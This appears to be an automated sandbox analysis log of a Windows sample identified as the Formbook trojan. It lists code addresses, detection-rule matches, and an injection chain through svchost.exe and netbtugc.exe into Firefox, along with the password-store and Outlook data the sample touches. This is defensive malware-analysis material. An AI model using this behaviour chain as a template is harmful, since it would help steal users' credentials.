            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0384B16B5_2_0384B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0382F0CC5_2_0382F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383F0E05_2_0383F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038370E95_2_038370E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037870C05_2_037870C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383F7B05_2_0383F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037C56305_2_037C5630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038316CC5_2_038316CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0381D5B05_2_0381D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038375715_2_03837571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037714605_2_03771460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383F43F5_2_0383F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037BDBF95_2_037BDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037F5BF05_2_037F5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383FB765_2_0383FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0379FB805_2_0379FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037F3A6C5_2_037F3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03821AA35_2_03821AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0381DAAC5_2_0381DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0382DAC65_2_0382DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03837A465_2_03837A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383FA495_2_0383FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037C5AA05_2_037C5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037899505_2_03789950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0379B9505_2_0379B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038159105_2_03815910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037ED8005_2_037ED800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037838E05_2_037838E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383FFB15_2_0383FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383FF095_2_0383FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03743FD55_2_03743FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03743FD25_2_03743FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03781F925_2_03781F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03789EB05_2_03789EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03783D405_2_03783D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0379FDC05_2_0379FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03831D5A5_2_03831D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03837D735_2_03837D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037F9C325_2_037F9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383FCF25_2_0383FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D51A305_2_02D51A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D4CB805_2_02D4CB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D4C9595_2_02D4C959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D4C9605_2_02D4C960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D4AC005_2_02D4AC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D5329B5_2_02D5329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D532A05_2_02D532A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D532595_2_02D53259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D550B05_2_02D550B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D6B5F05_2_02D6B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358E3385_2_0358E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358E7EC5_2_0358E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358E4535_2_0358E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358CB035_2_0358CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358CAAB5_2_0358CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358D8585_2_0358D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 037C7E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 037FF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0376B970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 037B5130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 037EEA12 appears 86 times
            Source: jpdy1E8K4A.exe, 00000000.00000003.2141380419.0000000004623000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs jpdy1E8K4A.exe
            Source: jpdy1E8K4A.exe, 00000000.00000003.2140771082.00000000047CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs jpdy1E8K4A.exe
            Source: jpdy1E8K4A.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/10
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeFile created: C:\Users\user\AppData\Local\Temp\supergroupsJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCommand line argument: #v0_2_0040D6B0
            Source: jpdy1E8K4A.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE server_addresses (id VARCHAR, company_name VARCHAR, street_address VARCHAR, address_1 VARCHAR, address_2 VARCHAR, address_3 VARCHAR, address_4 VARCHAR, postal_code VARCHAR, sorting_code VARCHAR, country_code VARCHAR, language_code VARCHAR, recipient_name VARCHAR, phone_number VARCHAR)x;
            Source: netbtugc.exe, 00000005.00000003.2649098471.0000000003180000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2649228244.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2651714036.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.00000000031D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: jpdy1E8K4A.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeFile read: C:\Users\user\Desktop\jpdy1E8K4A.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\jpdy1E8K4A.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"Jump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: jpdy1E8K4A.exeStatic file information: File size 1401503 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: URUrIrqwFu.exe, 00000003.00000000.2269264068.000000000049E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: jpdy1E8K4A.exeStatic PE information: real checksum: 0xa961f should be: 0x15adcb
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403060 push eax; ret 2_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160FC push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041613C push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D211 pushad ; ret 2_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004132A3 push esi; ret 2_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041136F push edi; retf 2_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135D8 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135E3 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414594 push edi; retf 2_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E61E push eax; retf 2_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016F6 push ss; ret 2_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0225F pushad ; ret 2_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A027FA pushad ; ret 2_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0283D push eax; iretd 2_2_03A02858
